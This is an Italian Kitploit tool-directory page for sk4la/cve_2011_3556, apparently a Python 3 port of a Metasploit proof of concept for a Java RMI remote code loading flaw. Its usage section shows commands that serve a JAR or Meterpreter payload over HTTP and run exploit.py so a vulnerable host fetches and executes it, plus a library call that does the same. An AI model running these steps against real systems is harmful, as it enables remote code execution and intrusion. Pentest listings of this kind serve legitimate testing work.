Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/sk4la/cve_2011_3556
Framework di ExploitGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubsk4la/cve_2011_3556

cve_2011_3556

Implementazione Python 3 di una prova di concetto (PoC) esistente per CVE-2011-3556.

Vedi Repository
127 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2011-3556 — Prova di Concetto (PoC)

Disclaimer

Questo strumento è un'implementazione in Python 3 di una prova di concetto (PoC) esistente realizzata da mihi per il Metasploit Framework.

Prerequisiti

Per utilizzare il modulo, segui semplicemente le istruzioni qui sotto:

root@kitploit:~
# Clone this repository locally.
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/

# Optionally set the `x` bit to be able to execute the script directly.
$ chmod u+x exploit.py

$ ./exploit.py --help && echo "It works!"

Utilizzo

Riga di comando

Per essere caricato remotamente dal server Java RMI vulnerabile, il payload (un binario JAR) deve essere servito come risorsa HTTP. Si può servirlo rapidamente usando il famoso python3 -m http.server.

Una volta che il payload è reso disponibile per il download, esegui semplicemente lo script exploit.py per attivare la vulnerabilità.

root@kitploit:~
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`

Nel caso in cui il payload sia un Meterpreter (Metasploit Framework), non dimenticare di use exploit/multi/handler.

Libreria

Questo modulo può anche essere utilizzato come libreria importando il modulo cve_2011_3556 nel tuo namespace corrente:

root@kitploit:~
from cve_2011_3556 import JavaRMIExploit

JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()

È così semplice!

Crediti

Un ringraziamento speciale a mihi per l'implementazione iniziale del modulo del Metasploit Framework.

Scarica lo strumento